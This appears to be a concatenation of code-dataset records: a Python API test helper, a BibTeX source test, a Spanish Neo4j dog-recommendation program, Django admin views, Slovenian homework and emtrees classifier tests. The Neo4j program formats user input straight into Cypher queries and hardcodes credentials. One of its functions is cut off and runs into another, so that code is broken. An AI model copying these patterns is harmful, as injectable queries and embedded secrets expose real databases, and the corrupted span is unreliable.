schedule_status_override,\n \"schedule_status_override_start_timestamp\": schedule_status_override_start_timestamp,\n \"schedule_status_override_end_timestamp\": schedule_status_override_end_timestamp,\n \"test_pause_at_timestamp\": test_pause_at_timestamp,\n },\n }\n\n post_body = json.dumps(post_body)\n\n resp = endtoend.helper.send_request(\n \"post\", \"/v1/account-schedule-tags\", data=post_body\n )\n\n return resp\n\n\ndef list_account_schedule_tags(result_limit: int) -> List[Dict[str, str]]:\n\n return endtoend.helper.list_resources(\n \"account-schedule-tags\", result_limit=result_limit\n )\n\n\ndef batch_get_account_schedule_tags(\n account_schedule_tag_ids: List[str],\n) -> Dict[str, Dict[str, str]]:\n\n return endtoend.helper.send_request(\n \"get\",\n \"/v1/account-schedule-tags:batchGet\",\n params={\"ids\": account_schedule_tag_ids},\n )[\"account_schedule_tags\"]\n\n\ndef update_account_schedule_tag(\n account_schedule_tag_id: str,\n schedule_status_override: Optional[str] = None,\n schedule_status_override_start_timestamp: Optional[str] = None,\n schedule_status_override_end_timestamp: Optional[str] = None,\n test_pause_at_timestamp: Optional[str] = None,\n) -> Dict[str, str]:\n\n update_mask_paths = list()\n account_schedule_tag = dict()\n\n # status, start timestamp and end timestamp must all be set together\n if schedule_status_override:\n update_mask_paths.extend(\n [\n \"schedule_status_override\",\n \"schedule_status_override_start_timestamp\",\n \"schedule_status_override_end_timestamp\",\n ]\n )\n account_schedule_tag.update(\n {\n \"schedule_status_override\": schedule_status_override,\n \"schedule_status_override_start_timestamp\": (\n schedule_status_override_start_timestamp\n ),\n \"schedule_status_override_end_timestamp\": schedule_status_override_end_timestamp,\n }\n )\n\n if test_pause_at_timestamp:\n update_mask_paths.append(\"test_pause_at_timestamp\")\n account_schedule_tag[\"test_pause_at_timestamp\"] = test_pause_at_timestamp\n\n body = json.dumps(\n {\n \"request_id\": uuid.uuid4().hex,\n \"account_schedule_tag\": account_schedule_tag,\n \"update_mask\": {\"paths\": update_mask_paths},\n }\n )\n\n return endtoend.helper.send_request(\n \"put\", \"/v1/account-schedule-tags/\" + account_schedule_tag_id, data=body\n )\n\n\ndef get_calendar_events(\n calendar_ids: Optional[List[str]] = 
None,\n calendar_event_names: Optional[List[str]] = None,\n calendar_timestamp_from: str = \"\",\n calendar_timestamp_to: str = \"\",\n is_active: bool = True,\n active_calendar_event: Optional[CalendarEventStatus] = None,\n) -> List[Dict[str, Any]]:\n\n active_calendar_event = active_calendar_event or CalendarEventStatus.ONLY_TRUE\n\n body = {\n \"calendar_ids\": calendar_ids or [],\n \"calendar_event_names\": calendar_event_names or [],\n \"calendar_timestamp_range.from\": calendar_timestamp_from,\n \"calendar_timestamp_range.to\": calendar_timestamp_to,\n \"is_active\": str(is_active).lower(),\n \"active_calendar_event\": active_calendar_event.value,\n }\n resp = endtoend.helper.list_resources(\"calendar-event\", params=body)\n\n return resp\n\n\ndef create_calendar_event(\n event_id: str,\n calendar_id: str,\n name: str,\n is_active: bool,\n start_timestamp: datetime,\n end_timestamp: datetime,\n):\n post_body = {\n \"request_id\": uuid.uuid4().hex,\n \"calendar_event\": {\n \"id\": event_id,\n \"calendar_id\": calendar_id,\n \"name\": name,\n \"is_active\": is_active,\n \"start_timestamp\": start_timestamp,\n \"end_timestamp\": end_timestamp,\n },\n }\n\n resp = endtoend.helper.send_request(\n \"post\", \"/v1/calendar-event\", data=json.dumps(post_body)\n )\n\n return resp\n\n\ndef list_calendars(\n order_by: str = \"ORDER_BY_CREATE_TIMESTAMP_ASC\",\n name_pattern_match_pattern: str = None,\n name_pattern_match_match_type: str = \"MATCH_TYPE_UNKNOWN\",\n) -> List[Dict[str, Any]]:\n body = {\n \"order_by\": order_by,\n \"name_pattern_match.pattern\": name_pattern_match_pattern,\n \"name_pattern_match.match_type\": name_pattern_match_match_type,\n }\n resp = endtoend.helper.list_resources(\"calendars\", params=body)\n\n return resp\n\n\ndef create_calendar(\n calendar_id: str,\n is_active: bool = False,\n display_name: str = \"\",\n description: str = \"\",\n) -> Dict[str, str]:\n\n display_name = display_name or calendar_id\n description = description or calendar_id\n\n post_body = {\n \"request_id\": uuid.uuid4().hex,\n \"calendar\": {\n \"id\": calendar_id,\n \"is_active\": is_active,\n \"display_name\": display_name,\n \"description\": description,\n },\n }\n\n resp = endtoend.helper.send_request(\n \"post\", \"/v1/calendar\", data=json.dumps(post_body)\n )\n\n return resp\n\n\ndef update_calendar(\n calendar_id: str,\n is_active: bool = None,\n display_name: str = None,\n description: str = None,\n) -> Dict[str, str]:\n\n updated_fields = {}\n if is_active is not None:\n updated_fields[\"is_active\"] = is_active\n if display_name is not None:\n updated_fields[\"display_name\"] = display_name\n if description is not None:\n updated_fields[\"description\"] = description\n\n post_body = {\n \"request_id\": uuid.uuid4().hex,\n \"calendar\": updated_fields,\n \"update_mask\": {\"paths\": list(updated_fields.keys())},\n }\n\n resp = endtoend.helper.send_request(\n \"put\", f\"/v1/calendar/{calendar_id}:updateDetails\", data=json.dumps(post_body)\n )\n\n return resp\n\n\ndef get_contract_modules() -> List[Dict[str, Any]]:\n\n resp = endtoend.helper.list_resources(\"contract-modules\", params=None)\n\n return resp\n\n\ndef get_contract_module_versions(\n contract_module_id: str = \"\",\n) -> List[Dict[str, Any]]:\n\n body = {\n \"contract_module_id\": contract_module_id,\n }\n resp = endtoend.helper.list_resources(\n \"contract-module-versions\", params=body, page_size=10\n )\n\n return resp\n\n\ndef get_smart_contract_module_version_links(\n contract_version_id: str,\n) -> List[Dict[str, 
Any]]:\n\n    resp = endtoend.helper.list_resources(\n        \"smart-contract-module-versions-links\",\n        params={\"smart_contract_version_ids\": contract_version_id},\n    )\n\n    return resp\n\n\ndef get_postings_api_client(\n    client_id: str,\n) -> Dict[str, str]:\n    return endtoend.helper.send_request(\"get\", \"/v1/postings-api-clients/\" + client_id)\n\n\ndef create_postings_api_client(\n    request_id: str,\n    client_id: str,\n    response_topic: str,\n) -> Dict[str, str]:\n    post_body = {\n        \"request_id\": request_id,\n        \"postings_api_client\": {\n            \"id\": client_id,\n            \"response_topic\": response_topic,\n        },\n    }\n\n    return endtoend.helper.send_request(\n        \"post\", \"/v1/postings-api-clients\", data=json.dumps(post_body)\n    )\n\n\ndef init_postings_api_client(\n    client_id: str, response_topic: str, timeout: int = 5\n) -> Dict[str, str]:\n    \"\"\"\n    Postings API client can be missing on the target instance (i.e. bootstrap job as part of DR)\n    so ensure it's created if it cannot be found.\n    \"\"\"\n    for i in range(timeout):\n        try:\n            return get_postings_api_client(client_id)\n        except HTTPError as e:\n            if \"404\" not in e.args[0]:\n                # retry transient errors; only raise once the attempts are exhausted\n                if i < timeout - 1:\n                    time.sleep(1)\n                    continue\n                raise HTTPError(\n                    \"Unexpected error when trying to connect to endpoint /v1/postings-api-clients\"\n                ) from e\n\n    log.info(\n        \"Could not find existing Postings API Client with ID: %s. \"\n        \"Creating new Postings API Client with above ID.\",\n        client_id,\n    )\n    return create_postings_api_client(\n        request_id=str(uuid.uuid4()),\n        client_id=client_id,\n        response_topic=response_topic,\n    )\n","sub_path":"common/test_utils/endtoend/core_api_helper.py","file_name":"core_api_helper.py","file_ext":"py","file_size_in_byte":32933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}{"seq_id":"603214129","text":"import difflib\n\nimport betterbib\n\n# import time\n\n\ndef _main():\n    # args = _parse_cmd_arguments()\n\n    source = betterbib.Crossref()\n\n    # t = time.time()\n    _test_connection(source)\n    # elapsed = time.time() - t\n    # print(\"OK ({}s).\".format(elapsed))\n    # try:\n    # except:\n    #     print(\"FAILED.\\n\")\n    #     raise\n    return\n\n\ndef _test_connection(source):\n\n    test_entry = {\n        \"genre\": \"book\",\n        \"title\": \"A Framework for Deflated and Augmented \" \"Krylov Subspace Methods\",\n        \"author\": \"Gaul and Liesen\",\n        \"year\": \"2013\",\n    }\n\n    # Define the expected return string. Note that special characters need\n    # to be escaped.\n    expected = \"\"\"@book {MR3024841,\n    AUTHOR = {Liesen, J{\\\\\"o}rg and Strako{\\\\v{s}}, Zden{\\\\v{e}}k},\n     TITLE = {Krylov subspace methods},\n    SERIES = {Numerical Mathematics and Scientific Computation},\n      NOTE = {Principles and analysis},\n PUBLISHER = {Oxford University Press, Oxford},\n      YEAR = {2013},\n     PAGES = {xvi+391},\n      ISBN = {978-0-19-965541-0},\n   MRCLASS = {65F10 (65F15)},\n  MRNUMBER = {3024841},\nMRREVIEWER = {Melina A. Freitag},\n}\"\"\"\n\n    bt = source.find_unique(test_entry)\n    print(bt)\n\n    # Check the result.\n    if bt != expected:\n        diff = difflib.Differ().compare(bt, expected)\n        diff = \"\".join(\n            [\n                \"***\" + i[2:] + \"***\" if i[:1] == \"+\" else i[2:]\n                for i in diff\n                if i[:1] not in \"-?\"\n            ]\n        )\n        print()\n        print(\"Unexpected test result. 
Differences:\")\n        print(diff)\n        print()\n        raise RuntimeError(\"Connection established, but wrong search result.\")\n    return\n\n\ndef _parse_cmd_arguments():\n    import argparse\n\n    parser = argparse.ArgumentParser(description=\"Test a BibTeX source.\")\n    return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n    _main()\n","sub_path":"tools/test-source.py","file_name":"test-source.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}{"seq_id":"507514133","text":"\"\"\"\nAutores: Sebastian Aristondo, Daniel Gonzalez, Juan Carlos Bajan.\nModificacion: 31/05/2021\nDescripcion: Programa que permite realizar una recomendacion de perros.\n\"\"\"\n\nfrom neo4j import GraphDatabase\nfrom connection import *\nimport random\n\n\nañesartnoc=\"Computologo\"\n\n\"\"\"\n--------------------Terminos Y Condiciones--------------------\nPara que el proceso de recomendacion se pueda llevar a cabo,\nel usuario debe estar de acuerdo con ello y aceptar los\nterminos y condiciones de la misma. Para ello se inicia\npreguntandole al usuario si las acepta o no\n--------------------------------------------------------------\n\"\"\"\ndef TerminosYCondiciones():\n    respuesta=\"\"\n    while respuesta==\"\":\n        print(\"\"\"----------------Terminos y Condiciones--------------- \\n\n        Este sistema de recomendación, requiere de información proporcionada por usted,\n        esta sirve unicamente con el proposito de brindarle una recomendación acertada. Los datos\n        que se obtienen son totalmente privados. El sistema de recomendación desea pedirle permiso \n        para utilizar el resultado del perro que se le recomienda para agregarlo a un ranking y asi \n        mejorar las recomendaciones \\n ¿Acepta? \n        \"\"\")\n        respuesta=input(\"Si/No \\n\")\n        if respuesta.lower()==\"si\" or respuesta.lower()==\"no\":\n            if respuesta.lower()==\"si\":\n                return True\n            elif respuesta.lower()==\"no\":\n                return False\n        else:\n            respuesta=\"\"\n\n\n\"\"\"\n--------------------- agregar -------------------------\nCon el fin de mejorar el sistema de recomendacion, se diseno\nuna opcion para agregar mas componentes al grafo. 
En esta opcion\nel usuario ingresa (raza, comportamiento, espacio, tipo de pelo,\ntamano, complexion corporal, actividad fisica, expectativa de vida,\nhocico y orejas)\n--------------------------------------------------------------\n\"\"\"\ndef agregar(connection, db):\n    #Se le solicita al usuario que ingrese una contrasena\n    palabra=input(\"Por favor ingrese la palabra clave \\n\")\n    if palabra == añesartnoc:\n        # Se le solicita al usuario que ingrese la raza y las caracteristicas del nuevo perro\n        raza=input(\"Ingrese el nombre de la raza del perro a agregar a la base de datos \\n >\")\n        datos = {\"Comportamiento\":\"\", \"Espacio\":\"\",\"TipoPelo\":\"\", \"Tamano\": \"\", \"ComplexionCorporal\":\"\",\"ActividadFisica\":\"\",\"ExpectativaDeVida\":\"\", \"Hocico\": \"\",\"Orejas\":\"\"}\n        # El ciclo FOR recorre el diccionario datos y guarda la informacion que el usuario ingrese.\n        for keys in datos:\n            print(\"Seleccione la opcion con la que se siente más identificado según \"+keys)\n            dictionary = elementos(connection, db, keys)\n            elec = eleccion(dictionary)\n            datos[keys] = elec\n        # Se le asigna un ranking de 0 porque al ser un dato nuevo, no se le ha recomendado a nadie\n        datos[\"Ranking\"]=0\n        # Se envia el primer query para crear un perro\n        query = '''\n        CREATE (p:Perro{raza:\"%s\", ranking:'0'})\n        '''%(raza)\n        connection.query(query, db)\n        # Se envia otro query uniendo al perro con sus caracteristicas. Se envia en estructura del codigo de cypher para que la plataforma entienda el query.\n        query='''MATCH (p:Perro) WHERE p.raza = '%s'\n        MATCH (p1:Comportamiento) WHERE p1.comportamiento = '%s' \n        MERGE (p) -[:Comportamiento]-> (p1) WITH p\n        MATCH (p2:Espacio) WHERE p2.espacio = '%s'\n        MERGE (p) -[:Espacio]->(p2) WITH p\n        MATCH (p3:TipoPelo) WHERE p3.tipoPelo = '%s' \n        MERGE (p) -[:TipoPelo]->(p3) WITH p\n        MATCH (p4:Tamano) WHERE p4.tamano = '%s' \n        MERGE (p) -[:Tamano]->(p4) WITH p\n        MATCH (p5:ComplexionCorporal) WHERE p5.complexionCorporal = '%s' \n        MERGE (p) -[:ComplexionCorporal]->(p5) WITH p\n        MATCH (p6:ActividadFisica) WHERE p6.actividadFisica = '%s'\n        MERGE (p)-[:ActividadFisica]-> (p6) WITH p\n        MATCH (p7:ExpectativaDeVida) WHERE p7.expectativaDeVida = '%s'\n        MERGE (p)-[:ExpectativaDeVida]-> (p7) WITH p\n        MATCH (p8:Hocico) WHERE p8.hocico = '%s' \n        MERGE (p)-[:Hocico]-> (p8) WITH p\n        MATCH (p9:Orejas) WHERE p9.orejas = '%s'\n        MERGE (p)-[:Orejas]-> (p9) return p\n        '''%(raza,datos['Comportamiento'],datos['Espacio'],datos['TipoPelo'],datos['Tamano'],datos['ComplexionCorporal'],datos['ActividadFisica'],datos['ExpectativaDeVida'],datos['Hocico'], datos['Orejas'])\n        connection.query(query, db)\n    else:\n        #Si la contrasena es incorrecta se le indica al usuario\n        print(\"Palabra clave incorrecta, Esta opción es unicamente para personal calificado\")\n\n\n\"\"\"\n--------------------- quitar --------------------------\nAsi como se puede anadir un componente tambien se puede eliminar,\npara esto se diseno una herramienta para eliminar comparando el nombre\nque se ingreso con las razas almacenadas.\n--------------------------------------------------------------\n\"\"\"\ndef quitar(connection, db):\n    #Se le solicita al usuario que ingrese una contrasena\n    palabra=input(\"Por favor ingrese la palabra clave\\n\")\n    if palabra == añesartnoc:\n        condicion=True\n        query = 'MATCH (n:Perro) return n.raza'\n        temp = connection.query(query, db)\n        i = 1\n        dictionary = {}\n        # Se hace un ciclo while para imprimir todos los perros del grafo y luego devolver el perro que el usuario haya 
ingresado\n while condicion:\n for elements in temp:\n dictionary[i] = elements['n.raza']\n print(f\"{i}) {dictionary[i]}\")\n i = i+1\n perro= input(\"Ingrese el numero del perro que desea eliminar\")\n try:\n perro = int(perro)\n if perro\")\n try:\n elecop= int(elecop)\n if elecop > len(dic):\n print(f\"La opcion {elecop} no se encuentra entre las opciones\") \n else:\n return dic[elecop]\n bandera=False\n except ValueError:\n print(\"Porfavor ingrese la opción en formato de numero\")\n\n\n\n\"\"\"\n--------------- aumentar ranking ----------------------\nEsta Funcion aumenta el ranking del perro recomendado cada vez\nque se muestra al usuario.\n--------------------------------------------------------------\n\"\"\"\ndef aumentar_ranking(raza):\n query ='''\n MATCH (p:Perro{raza:\"%s\"}) return p.ranking'''%(raza)\n #result = \n\n\n\"\"\"\n------------------- resultado -------------------------\nEsta Funcion muestra al usuario el resultado obtenido por\nla busqueda.\n--------------------------------------------------------------\n\"\"\"\ndef resultado(query):\n perros = []\n for elements in query:\n perros.append(elements['p.raza'])\n\n i = random.randint(0,len(perros)-1)\n return perros[i]\n \n\n\"\"\"\n---------------- ConsultaUsuario ----------------------\nEsta Funcion solicita al usuario las caracteristicas que \ndesea que el su perro tenga, en base a esto se hace un query a\nla base de datos de Neo4J y se le da una respuesta.\n--------------------------------------------------------------\n\"\"\"\ndef ConsultaUsuario(connection, db):\n datos = {\"Comportamiento\":\"\", \"Espacio\":\"\",\"TipoPelo\":\"\", \"Tamano\": \"\", \"ComplexionCorporal\":\"\",\"ActividadFisica\":\"\",\"ExpectativaDeVida\":\"\", \"Hocico\": \"\",\"Orejas\":\"\"}\n # Se solicita al usuario la opcion que desee segun la caracteristica\n for keys in datos:\n print(\"Seleccione la opcion con la que se siente más identificado según \"+keys)\n dictionary = elementos(connection, db, keys)\n elec = eleccion(dictionary)\n datos[keys] = elec\n recomendacion = \"\"\n # Se le envia a la base de datos el query con las caracteristicas que selecciono el usuario\n query ='''\n MATCH (p:Perro)-[:Comportamiento]->(p1:Comportamiento{comportamiento:\"%s\"}),\n (p)-[:Espacio]-> (p4:Espacio{espacio:\"%s\"}),\n (p)-[:TipoPelo]-> (p5:TipoPelo{tipoPelo:\"%s\"}),\n (p)-[:Tamano]-> (p6:Tamano{tamano:\"%s\"}),\n (p)-[:ComplexionCorporal]-> (p7:ComplexionCorporal{complexionCorporal:\"%s\"}),\n (p)-[:ActividadFisica]-> (p8:ActividadFisica{actividadFisica:\"%s\"}),\n (p)-[:ExpectativaDeVida]-> (p9:ExpectativaDeVida{expectativaDeVida:\"%s\"}),\n (p)-[:Hocico]-> (p10:Hocico{hocico:\"%s\"}),\n (p)-[:Orejas]-> (p11:Orejas{orejas:\"%s\"}) return p.raza, p.ranking\n '''%(datos['Comportamiento'],datos['Espacio'],datos['TipoPelo'],datos['Tamano'],datos['ComplexionCorporal'],datos['ActividadFisica'],datos['ExpectativaDeVida'],datos['Hocico'], datos['Orejas'])\n query_result = connection.query(query, db)\n #Si se encuentra entonces se muestra al usuario.\n if query_result:\n recomendacion = query_ranking(connection, query_result)\n #En caso que no se encuentren, entonces se realiza un query con menos opciones\n elif not query_result:\n query ='''MATCH (p:Perro)-[:Comportamiento]->(p5:Comportamiento{comportamiento:\"%s\"}),\n (p)-[:Espacio]-> (p2:Espacio{espacio:\"%s\"}),\n (p)-[:Tamano]-> (p3:Tamano{tamano:\"%s\"}) return p.raza, p.ranking\n '''%(datos['Comportamiento'],datos['Espacio'],datos['Tamano'])\n query_result = connection.query(query, db)\n 
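# Si la consulta reducida tampoco devuelve resultados, el ultimo respaldo usa solo el comportamiento.\n        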
if query_result:\n            recomendacion = query_ranking(connection, query_result)\n        #En caso que no se encuentre de nuevo, se vuelve a hacer un query solo con el comportamiento.\n        elif not query_result:\n            query ='''MATCH (p:Perro)-[:Comportamiento]->(p5:Comportamiento{comportamiento:\"%s\"}) return p.raza, p.ranking\n            '''%(datos['Comportamiento'])\n            query_result = connection.query(query, db)\n            recomendacion = query_ranking(connection, query_result)\n\n    return recomendacion\n\n\n\n#Conexiones a base de datos.\nconn = Neo4jConnection(uri=\"bolt://localhost:####\", user=\"neo4j\", pwd=\"1234\")\ndb = 'neo4j'\n#temp = elementos(conn, db, \"Personalidad\", \"Personalidad\")\n#print(temp)\n\n#-----------------------Inicio del menu--------------------------------\nprint(\"¡Bienvenidos al sistema de recomendación de perros!\")\nperro = '''\n░░░░░░▄█▄█░░░░░▄░░░░░░\n░░░░██████░░░░░░█░░░░░\n░░░░░░███████████░░░░░\n▒▒▒▒▒▒█▀▀█▀▀██▀██▒▒▒▒▒\n▒▒▒▒▒▄█▒▄█▒▒▄█▒▄█▒▒▒▒▒\n'''\nprint(perro)\n\nperro = '''\n ___\n __/_ `. .-\"\"\"-.\n \\_,` | \\-' / )`-')\n \"\") `\"` \\ ((`\"`\n ___Y , .'7 /|\n(_,___/...-` (_/_/ \n'''\n\ncontinuar=True\nTYC=TerminosYCondiciones()\nwhile(continuar):\n    print(\"\\n1)Realizar recomendación\")\n    print(\"2)Agregar a la base de datos\")\n    print(\"3)Eliminar de la base de datos\")\n    print(\"4)Salir\\n\")\n    op1=input(\"¿Que opción desea realizar?\\n>\")\n    try:\n        op1 = int(op1)\n    except ValueError:\n        print(\"Opcion no valida\")\n        continue\n\n    if op1==1:\n        RecomendacionExitosa=ConsultaUsuario(conn, db)\n        print(f\"Se le recomienda conseguir un perro de raza: {RecomendacionExitosa}\")\n        print(perro)\n    elif op1==2:#Agregar a la base de datos\n        agregar(conn,db)\n    elif op1==3:#Quitar de la base de datos\n        quitar(conn,db)\n    elif op1==4:\n        continuar=False\n        print(\"Muchas gracias por utilizar el sistema de recomendacion\") \n\n","sub_path":"Codigo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}{"seq_id":"516523093","text":"from django.http import HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse, reverse_lazy\nfrom django.views.generic import CreateView, DetailView, UpdateView, DeleteView\n\nfrom adminapp.forms import ProductEditForm\nfrom mainapp.models import ProductCategory, Product\n\n\n# вычисляю pk товара, для формирования обратных адресов на текущую категорию товара\ndef get_pk(self):\n    if len(Product.objects.filter(category_id=self.kwargs.get('pk'))) > 0:\n        return Product.objects.filter(category_id=self.kwargs.get('pk'))\n    else:\n        return {'category': ProductCategory.objects.get(id=self.kwargs.get(\"pk\")),\n                'pk': ProductCategory.objects.get(id=self.kwargs.get(\"pk\")).pk}\n###################################################################################\n\n\nclass ProductCreateView(CreateView):\n    model = Product\n    form_class = ProductEditForm\n    template_name = 'adminapp/product_create.html'\n    success_url = reverse_lazy('admin_stuff:products')\n\n    def get_success_url(self):\n        return reverse_lazy('admin_stuff:products',\n                            kwargs={'pk': ProductCategory.objects.get(id=self.kwargs.get(\"pk\")).pk})\n\n    def get_initial(self):\n        initial = super(ProductCreateView, self).get_initial()\n        initial['category'] = get_object_or_404(ProductCategory, pk=self.kwargs.get('pk'))\n        initial['price'] = ''\n        initial['quantity'] = ''\n        return initial\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        
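# передаю в шаблон заголовок страницы и данные для обратных адресов на категорию\n        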
context['title'] = 'Создание нового продукта'\n        context['product'] = get_pk(self)\n        return context\n\n\nclass ProductsCreateView(CreateView):\n    model = Product\n    template_name = 'adminapp/products.html'\n    form_class = ProductEditForm\n    context_object_name = 'product'\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['title'] = f'Товары категории \"{ProductCategory.objects.get(id=self.kwargs.get(\"pk\"))}\"'\n        context['object_list'] = Product.objects.filter(category_id=self.kwargs.get('pk'))\n        context['prod'] = get_pk(self)\n        return context\n\n\nclass ProductDetailView(DetailView):\n    model = Product\n    template_name = 'adminapp/product_read.html'\n\n    def get_context_data(self, **kwargs):\n        content = super().get_context_data(**kwargs)\n        content['title'] = f'продукт/{self.object.name}'\n        return content\n\n\nclass ProductUpdateView(UpdateView):\n    model = Product\n    template_name = 'adminapp/product_update.html'\n    success_url = 'admin_stuff:products'\n    form_class = ProductEditForm\n\n    def get_success_url(self):\n        product = get_object_or_404(Product, pk=self.kwargs['pk'])\n        return reverse_lazy('admin_stuff:products', kwargs={'pk': product.category.pk})\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['title'] = f'Редактирование {self.object.name}'\n        return context\n\n\nclass ProductDeleteView(DeleteView):\n    model = Product\n    template_name = 'adminapp/product_delete.html'\n    success_url = 'admin_stuff:products'\n\n    def get_success_url(self):\n        product = get_object_or_404(Product, pk=self.kwargs['pk'])\n        return reverse_lazy('admin_stuff:products', kwargs={'pk': product.category.pk})\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['title'] = f'Удаление {self.object.name}'\n        return context\n\n    def delete(self, request, *args, **kwargs):\n        self.object = self.get_object()\n        self.object.is_deleted = True\n        self.object.save()\n        return HttpResponseRedirect(self.get_success_url())\n\n\n","sub_path":"logbox_shop/adminapp/views_products/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":3973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}{"seq_id":"454902515","text":"# DN4\n\nfrom math import *\n\n# ogrevalna naloga: koordinate\n\ndef koordinate(ime, kraji):\n    for kraj, x, y in kraji:\n        if kraj == ime:\n            return x, y\n\n# ogrevalna naloga: razdalja_koordinat\n\ndef razdalja_koordinat(x1, y1, x2, y2):\n    return sqrt ((x1 - x2) ** 2 + (y1 - y2) ** 2)\n\n# ogrevalna naloga: razdalja_krajev\n\ndef razdalja(ime1, ime2, kraji):\n    x1, y1 = koordinate (ime1, kraji)\n    x2, y2 = koordinate (ime2, kraji)\n    return razdalja_koordinat (x1, y1, x2, y2)\n\n# obvezna naloga: v_dometu\n\ndef v_dometu(ime, domet, kraji):\n    seznam_krajev = []\n    for kraj, x, y in kraji:\n        if kraj == ime:\n            x1, y1 = x, y\n    for tarce, x2, y2 in kraji:\n        razdalja = sqrt ((x2 - x1) ** 2 + (y2 - y1) ** 2)\n        if razdalja <= domet and razdalja != 0:\n            seznam_krajev.append(tarce)\n    return seznam_krajev\n\n# obvezna naloga: najbolj_oddaljeni\n\ndef najbolj_oddaljeni(ime, imena, kraji):\n    naj_oddaljen = 0\n    for kraj, x, y in kraji:\n        if kraj == ime:\n            x1, y1 = x, y\n    for tarce, x2, y2 in kraji:\n        for mesto in imena:\n            if mesto == tarce:\n                razdalja = sqrt ((x2 - x1) ** 2 + (y2 - y1) ** 2)\n                if razdalja > naj_oddaljen:\n                    naj_oddaljen = razdalja\n                    oddaljen_kraj = mesto\n    return oddaljen_kraj\n\n# obvezna naloga: 
zalijemo\n\ndef zalijemo(ime, domet, kraji):\n naj_oddaljen = 0\n for kraj, x, y in kraji:\n if kraj == ime:\n x1, y1 = x, y\n for tarce, x2, y2 in kraji:\n razdalja = sqrt ((x2 - x1) ** 2 + (y2 - y1) ** 2)\n if domet >= razdalja and naj_oddaljen <= razdalja:\n naj_oddaljen = razdalja\n oddaljen_kraj = tarce\n return oddaljen_kraj\n\n# dodatna naloga: presek\n\ndef presek(s1, s2):\n presek = []\n for e1 in s1:\n for e2 in s2:\n if e1 == e2:\n presek.append(e1)\n\n return presek\n\n# dodatna naloga: skupno_zalivanje\n\ndef skupno_zalivanje(ime1, ime2, domet, kraji):\n tarce_ime1 = []\n tarce_ime2 = []\n presek = []\n for kraj, x, y in kraji:\n if kraj == ime1:\n x1, y1 = x, y\n for tarce, x2, y2 in kraji:\n razdalja = sqrt ((x2 - x1) ** 2 + (y2 - y1) ** 2)\n if domet >= razdalja:\n tarce_ime1.append (tarce)\n if kraj == ime2:\n x1, y1 = x, y\n for tarce, x2, y2 in kraji:\n razdalja = sqrt ((x2 - x1) ** 2 + (y2 - y1) ** 2)\n if domet >= razdalja:\n tarce_ime2.append (tarce)\n for e1 in tarce_ime1:\n for e2 in tarce_ime2:\n if e1 == e2:\n presek.append(e1)\n return presek\n\n\n\n\n\n\n\n\n","sub_path":"code/batch-1/vse-naloge-brez-testov/DN4-M-161.py","file_name":"DN4-M-161.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"337491086","text":"\nimport subprocess\nimport os\nimport os.path\n\nimport sklearn\nimport numpy\nfrom sklearn import datasets\nfrom sklearn import model_selection\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import metrics\nfrom sklearn.utils.estimator_checks import check_estimator \n\nimport emtrees\n\n\n\ndef build_classifier(estimator, name='test_trees', temp_dir='tmp/', func=None):\n if not os.path.exists(temp_dir):\n os.makedirs(temp_dir)\n\n tree_name = name\n if func is None:\n func = 'emtrees_predict(&{}, values, length)'.format(tree_name)\n def_file = os.path.join(temp_dir, name+'.def.h')\n code_file = os.path.join(temp_dir, name+'.c')\n bin_path = os.path.join(temp_dir, name)\n\n # Trivial program that reads values on stdin, and returns classifications on stdout\n code = \"\"\"\n #include \"emtrees_test.h\"\n #include \"{def_file}\"\n\n static void classify(const EmtreesValue *values, int length, int row) {{\n const int32_t class = {func};\n printf(\"%d,%d\\\\n\", row, class);\n }}\n int main() {{\n emtrees_test_read_csv(stdin, classify);\n }}\n \"\"\".format(**locals())\n\n with open(def_file, 'w') as f:\n f.write(estimator.output_c(tree_name))\n\n with open(code_file, 'w') as f:\n f.write(code)\n\n args = [ 'cc', '-std=c99', code_file, '-o', bin_path, '-I./test', '-I.' 
]\n subprocess.check_call(args)\n\n return bin_path\n\ndef run_classifier(bin_path, data):\n lines = []\n for row in data:\n lines.append(\",\".join(str(v) for v in row))\n stdin = '\\n'.join(lines)\n\n args = [ bin_path ]\n out = subprocess.check_output(args, input=stdin, encoding='utf8', universal_newlines=True)\n\n classes = []\n for line in out.split('\\n'):\n if line:\n row,class_ = line.split(',')\n class_ = int(class_)\n classes.append(class_)\n\n assert len(classes) == len(data)\n\n return classes\n\ndef test_randomforest_api():\n check_estimator(emtrees.RandomForest)\n\ndef test_extratrees_api():\n check_estimator(emtrees.ExtraTrees)\n\n\ndef test_basic_binary_classification():\n X, Y = datasets.make_classification(n_classes=2, n_samples=1000, random_state=1)\n trees = emtrees.RandomForest(n_estimators=10, max_depth=10, random_state=1)\n X = (X * 2**16).astype(int) # convert to integer\n scores = model_selection.cross_val_score(trees, X, Y, scoring='accuracy')\n\n assert numpy.mean(scores) > 0.7, scores\n\ndef test_binary_classification_compiled():\n X, Y = datasets.make_classification(n_classes=2, random_state=1)\n trees = emtrees.RandomForest(n_estimators=3, max_depth=5, random_state=1)\n X = (X * 2**16).astype(int) # convert to integer\n trees.fit(X, Y)\n\n p = build_classifier(trees)\n predicted = run_classifier(p, X)\n accuracy = metrics.accuracy_score(Y, predicted)\n\n assert accuracy > 0.9 # testing on training data\n\ndef test_extratrees_classification_compiled():\n X, Y = datasets.make_classification(n_classes=2, random_state=1)\n trees = emtrees.ExtraTrees(n_estimators=3, max_depth=5, random_state=1)\n X = (X * 2**16).astype(int) # convert to integer\n trees.fit(X, Y)\n\n p = build_classifier(trees)\n predicted = run_classifier(p, X)\n accuracy = metrics.accuracy_score(Y, predicted)\n\n assert accuracy > 